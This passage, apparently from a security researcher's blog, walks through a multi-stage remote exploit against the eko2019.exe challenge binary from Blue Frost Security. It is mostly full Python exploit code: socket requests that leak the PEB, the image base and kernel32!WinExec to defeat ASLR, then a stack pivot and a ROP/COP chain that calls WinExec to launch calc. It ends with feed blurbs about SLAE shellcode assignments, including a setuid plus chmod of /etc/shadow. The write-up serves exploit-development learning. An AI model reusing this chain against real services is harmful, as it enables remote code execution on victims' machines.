# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

We hit our NOP and then execute it, sliding into our intended instruction.

We execute the above instruction- and we see a virtual address has been loaded into RAX! This is presumably the base address of eko2019.exe.

To verify this, let’s check what the base address of eko2019.exe is in WinDbg.

Awesome! We have successfully extracted the base virtual address of eko2019.exe and stored it in a variable on the remote client.

This means now, that when we need to execute our code in the future- we can dynamically resolve our ROP gadgets via offsets- and ASLR will no longer be a problem! The only question remains- how are we going to execute any code?

Mom, The Application Is Still Leaking!

For this blog post, we are going to pop calc.exe to verify code execution is possible. Since we are going to execute calc.exe as our proof of concept, using the Windows API function WinExec() makes the most sense to us. This is much easier than going through with a full VirtualProtect() function call, to make our code executable- since all we will need to do is pop calc.exe.

Since we already have the ability to dynamically resolve all of eko2019.exe’s virtual address space- let’s see if we can find any addresses within eko2019.exe that leak a pointer to kernel32.dll (where WinExec() resides) or WinExec() itself.

As you can see below, eko2019.exe+0x9010 actually leaks a pointer to WinExec()!

This is perfect, due to the fact we have a read primitive which extracts the value that a virtual address points to! In this case, eko2019.exe+0x9010 points to WinExec(). Again, we don’t need to push rcx or access any special registers like the GS segment register- we just want to extract the pointer in RCX (which we will fill with eko2019.exe+0x9010). Let’s update our proof of concept with a fourth request, to leak the address of WinExec() in kernel32.dll.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

# 16 total bytes
print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

Landing on the move instruction, we can see that the address of WinExec() is about to be extracted from RCX!

When this instruction executes, the value will be loaded into RAX and then returned to us (the client)!

Do What You Can, With What You Have, Where You Are- Teddy Roosevelt

Recall up until this point, we have the following primitives:

  1. Write primitive- we can control the value of RCX, one byte around our mov instruction, and we can control a lot of the stack.
  2. Read primitive- we have the ability to read in values of pointers.

Using our ability to control RCX, we may have a potential way to pivot back to the stack. If you can recall from earlier, when we first increased our number of bytes from 512 to 528 and the \x41 byte was accessed BEFORE the mov rax, qword ptr [rcx] instruction was executed (which resulted in an access violation and a subsequent crash), the disassembler didn’t interpret \x41 as part of the mov rax, qword ptr [rcx] instruction set- because that opcode doesn’t create a valid set of opcodes with said move instruction.

Investigating a little bit more, we can recall that our move instruction also ends with a ret, which will take the value located at RSP (the stack), and execute it. Since we can control RCX- if we could find a way to load RCX into RSP, we would return to that value and execute it, via the ret that exits the function call. What would make sense to us, is to load RCX with a ROP gadget that would add rsp, X (which would make RSP point into our user controlled portion of the stack) and then start executing there! The question still remains however- even though we can control RCX, how are we going to execute what is in it?

After some trial and error, I finally came to a pretty neat conclusion! We can load RCX with the address of our stack pivot ROP gadget. We can then replace the \x41 byte from earlier (we changed this byte to \x65 in the PEB portion of this exploit) with a \x51 byte!

The \x51 byte is the opcode that corresponds to the push rcx instruction! Pushing RCX will allow us to place our user controlled value of RCX onto the stack (which is a stack pivot ROP gadget). Pushing an item on the stack, will actually load said item into RSP! This means that we can load our own ROP gadget into RSP, and then execute the ret instruction to leave the function- which will execute our ROP gadget! The first step for us, is to find a ROP gadget! We will use rp++ to enumerate all ROP gadgets from eko2019.exe.

After running rp++, we find an ideal ROP gadget that will perform the stack pivot.

This gadget will raise the stack up in value, to load our user controlled values into RSP and subsequent bytes after RSP! Notice how each gadget does not show the full virtual address of the pointer. This is because of ASLR! If we look at the last 4 or so bytes, we can see that this is actually the offset from the base virtual address of eko2019.exe to said pointer. In this case, the ROP gadget we are going after is located at eko2019.exe + 0x158b.

Let’s update our proof of concept with the stack pivot implemented.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

# 4th stage

# 16 total bytes
print "[+] Sending the fourth header..."
exploit_4 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_4 += "\x41" * 512

# push rcx (which we control)
exploit_4 += "\x51"

# Padding to load eko2019.exe+0x158b
exploit_4 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_4 += struct.pack('<Q', base_address+0x158b)

# Message needs to be 528 bytes total
exploit_4 += "\x41" * (544-len(exploit_4))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_4)

print "[+] Pivoted to the stack!"

# Don't need to index any data back through our read primitive, as we just want to stack pivot here
# Receiving data back from a connection is always best practice
s.recv(1024)

# Close the connection
s.close()

After executing the updated proof of concept, we continue execution to our move instruction as always. This time, we land on our intended push rcx instruction after executing the first two requests!

In addition, we can see RCX contains our specified ROP gadget!

After stepping through the push rcx instruction, we can see our ROP gadget gets loaded into RSP!

The next move instruction doesn’t matter to us at this point- as we are only worried about returning to the stack.

After we execute our ret to exit this function, we can clearly see that we have returned into our specified ROP gadget!

After we add to the value of RSP, we can see that when this ROP gadget returns- it will return into a region of memory that we control on the stack. We can view this via the Call stack in WinDbg.

Now that we have been able to successfully pivot back to the stack, it is time to attempt to pop calc.exe. Let’s start executing some useful ROP gadgets!

Recall that since we are working with the x64 architecture, we have to adhere to the __fastcall calling convention. As mentioned before, the registers we will use are:

  1. RCX -> First argument
  2. RDX -> Second argument
  3. R8 -> Third argument
  4. R9 -> Fourth argument
  5. RSP + 0x20 -> Fifth argument
  6. RSP + 0x28 -> Sixth argument
  7. etc.

A call to WinExec() is broken down as such, according to its documentation.

UINT WinExec(
  LPCSTR lpCmdLine,
  UINT   uCmdShow
);

This means that all we need to do, is place a value in RCX and RDX- as this function only takes two arguments.

Since we want to pop calc.exe, the first argument in this function should be a POINTER to an address that contains the string “calc”, which should be null terminated. This should be stored in RCX. lpCmdLine (the argument we are fulfilling) is the name of the application we would like to execute. Remember, this should be a pointer to the string.

The second argument, stored in RDX, is uCmdShow. These are the “display options”. The easiest option here, is to use SW_SHOWNORMAL- which just executes and displays the application normally. This means we will just need to place the value 0x1 into RDX, which is representative of SH_SHOWNORMAL.

Note- you can find all of these ROP gadgets from running rp++.

To start our ROP chain, we will just implement a “ROP NOP”, which will just return to the stack. This gadget is located at eko2019.exe+0x10a1

exploit_4 += struct.pack('<Q', base_address+0x10a1)			# ret: eko2019.exe

The next thing we would like to do, is get a pointer to the string “calc” into RCX. In order to do this, we are going to need to have write permissions to a memory address. Then, using a ROP gadget, we can overwrite what this address points to with our own value of “calc”, which is null terminated. Looking in IDA, we see only one of the sections that make up our executable has write permissions.

This means that we need to pick an address from the .data section within eko2019.exe to overwrite. The address we will use is eko2019.exe+0xC288- as it is the first available “blank” address.

We will place this address into RCX, via the following ROP/COP gadgets:

exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe

In this program, there was only one ROP gadget that allowed us to control RCX in the manner we wished- which was mov rcx, rax ; call r12. Obviously, this gadget will not return to the stack like a ROP gadget- but it will call a register afterwards. This is what is known as “Call-Oriented Programming”, or COP. You may be asking “this address will not return to the stack- how will we keep executing”? There is an explanation for this!

Essentially, before we use the COP gadget, we can pop a ROP gadget into the register that will be called (e.g. R12 in this case). Then, when the COP gadget is executed and the register is called- it will be actually peforming a call to a ROP gadget we specify- which will be a return back to the stack in this case, via an add rsp, X instruction. Here is how this looks in totality.

# The next gadget is a COP gadget that does not return, but calls r12
# Placing an add rsp, 0x10 gadget to act as a "return" to the stack into r12
exploit_4 += struct.pack('<Q', base_address+0x4a8e)			# pop r12 ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0x8789)			# add rsp, 0x10 ; ret: eko2019.exe 

# Grabbing a blank address in eko2019.exe to write our calc string to and create a pointer (COP gadget)
# The blank address should come from the .data section, as IDA has shown this the only segment of the executable that is writeable
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe
exploit_4 += struct.pack('<Q', 0x4141414141414141)			# Padding from add rsp, 0x10

Great! This sequence will load a writeable address into the RCX register. The task now, is to somehow overwrite what this address is pointing to.

We stumble across another interesting ROP gadget that can help us achieve this goal!

mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret

This ROP gadget is from kernel32.dll. As you can recall, WinExec() is exported by kernel32.dll. This means we already have a valid address within kernel32.dll. Knowing this, we can find the distance between WinExec() and the base of kernel32.dll- which would allow us to dynamically resolve the base virtual address of kernel32.dll.

kernel32_base = kernel32_winexec-0x5e390

WinExec() is 0x5e390 bytes into kernel32.dll (on this version of Windows 10). Subtracting this value, will give us the base adddress of kernel32.dll! Now that we have resolved the base, this will allow us to calculate the offset and virtual memory address of our gadget in kernel32.dll dynamically.

Looking back at our ROP gadget- this gives us the ability to take the value in RAX and move it into the value POINTED TO by RCX. RCX already contains the address we would like to overwrite- so this is a perfect match! All we need to do now, is load the string “calc” (null terminated) into RAX! Here is what this looks like all put together.

# Creating a pointer to calc string
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += "calc\x00\x00\x00\x00"					# calc (with null terminator)
exploit_4 += struct.pack('<Q', kernel32_base+0x6130f)		        # mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret: kernel32.dll

# Padding for add rsp, 0x0000000000000080 and pop rbx
exploit_4 += "\x41" * 0x88

One things to keep in mind is that the ROP gadget that creates the pointer to “calc” (null terminated) has a few extra instructions on the end that we needed to compensate for.

The second parameter is much more straight forward. In kernel32.dll, we found another gadget that allows us to pop our own value into RDX.

# Placing second parameter into rdx
exploit_4 += struct.pack('<Q', kernel32_base+0x19daa)		# pop rdx ; add eax, 0x15FF0006 ; ret: kernel32.dll
exploit_4 += struct.pack('<Q', 0x01)			        # SH_SHOWNORMAL

Perfect! At this point, all we need to do is place the call to WinExec() on the stack! This is done with the following snippet of code.

# Calling kernel32!WinExec
exploit_4 += struct.pack('<Q', base_address+0x10a1)		# ret: eko2019.exe (ROP NOP)
exploit_4 += struct.pack('<Q', kernel32_winexec)	        # Address of kernel32!WinExec

In addition, we need to return to a valid address on the stack after the call to WinExec() so our prgram doesn’t crash after calc.exe is called. This is outlined below.

exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x2e71)			# add rsp, 0x38 ; ret: eko2019.exe

The final exploit code can be found here on my GitHub.

Let’s step through this final exploit in WinDbg to see how things break down.

We have already shown that our stack pivot was successful. After the pivot back to the stack and our ROP NOP which just returns back to the stack is executed, we can see that our pop r12 instruction has been hit. This will load a ROP gadget into R12 that will return to the stack- due to the fact our main ROP gadget calls R12, as explained earlier.

After we step through the instruction, we can see our ROP gadget for returning back to the stack has been loaded into R12.

We hit our next gadget, which pops the writeable address in the .data section of eko2019.exe into RAX. This value will be eventually placed into the RCX register- where the first function argument for WinExec() needs to be.

RAX now contains the blank, writeable address in the .data section.

After this gadget returns, we hit our main gadget of mov rcx, rax ; call r12.

The value of RAX is then placed into RCX. After this occurs, we can see that R12 is called and is going to execute our return back to the stack, add rsp, 0x10 ; ret.

Perfect! Our COP gadget and ROP gadgets worked together to load our intended address into RCX.

Next, we execute on our next pop rax gadget, which loads the value of “calc” into RAX (null terminated). 636c6163 = clac in hex to text. This is because we are compensating for the endianness of our processor (little endian).

We land on our most important ROP gadget to date after the return from the above gadget. This will take the string “calc” (null terminated) and point the address in RCX to it.

The address in RCX now points to the null terminated string “calc”.

Perfect! All we have to do now, is pop 0x1 into RDX- which has been completed by the subsequent ROP gadget.

Perfect! We have now landed on the call to WinExec()- and we can execute our shellcode!

All that is left to do now, is let everything run as intended!

Let’s run the final exploit.

Calc.exe FTW!

Big shoutout to Blue Frost Security for this binary- this was a very challenging experience and I feel I learned a lot from it. A big shout out as well to my friend @trickster012 for helping me with some of the problems I was having with __fastcall initially. Please contact me with any comments, questions, or corrections.

Peace, love, and positivity :-)

SLAE – Assignment #6: Polymorphic Shellcode

By: voidsec
2 April 2020 at 14:39

Assignment #6: Polymorphic Shellcode Sixth SLAE’s assignment requires to create three different (polymorphic) shellcodes version starting from published Shell Storm’s examples. I’ve decided to take this three in exam: http://shell-storm.org/shellcode/files/shellcode-752.php – linux/x86 execve (“/bin/sh”) – 21 bytes http://shell-storm.org/shellcode/files/shellcode-624.php – linux/x86 setuid(0) + chmod(“/etc/shadow”,0666) – 37 bytes http://shell-storm.org/shellcode/files/shellcode-231.php – linux/x86 open cd-rom loop (follows “/dev/cdrom” symlink) […]

The post SLAE – Assignment #6: Polymorphic Shellcode appeared first on VoidSec.

SLAE – Assignment #7: Custom Shellcode Crypter

By: voidsec
2 April 2020 at 14:55

Assignment #7: Custom Shellcode Crypter Seventh and last SLAE’s assignment requires to create a custom shellcode crypter. Since I had to implement an entire encryption schema both in python as an helper and in assembly as the main decryption routine, I’ve opted for something simple. I’ve chosen the Tiny Encryption Algorithm (TEA) as it does […]

The post SLAE – Assignment #7: Custom Shellcode Crypter appeared first on VoidSec.

❌
❌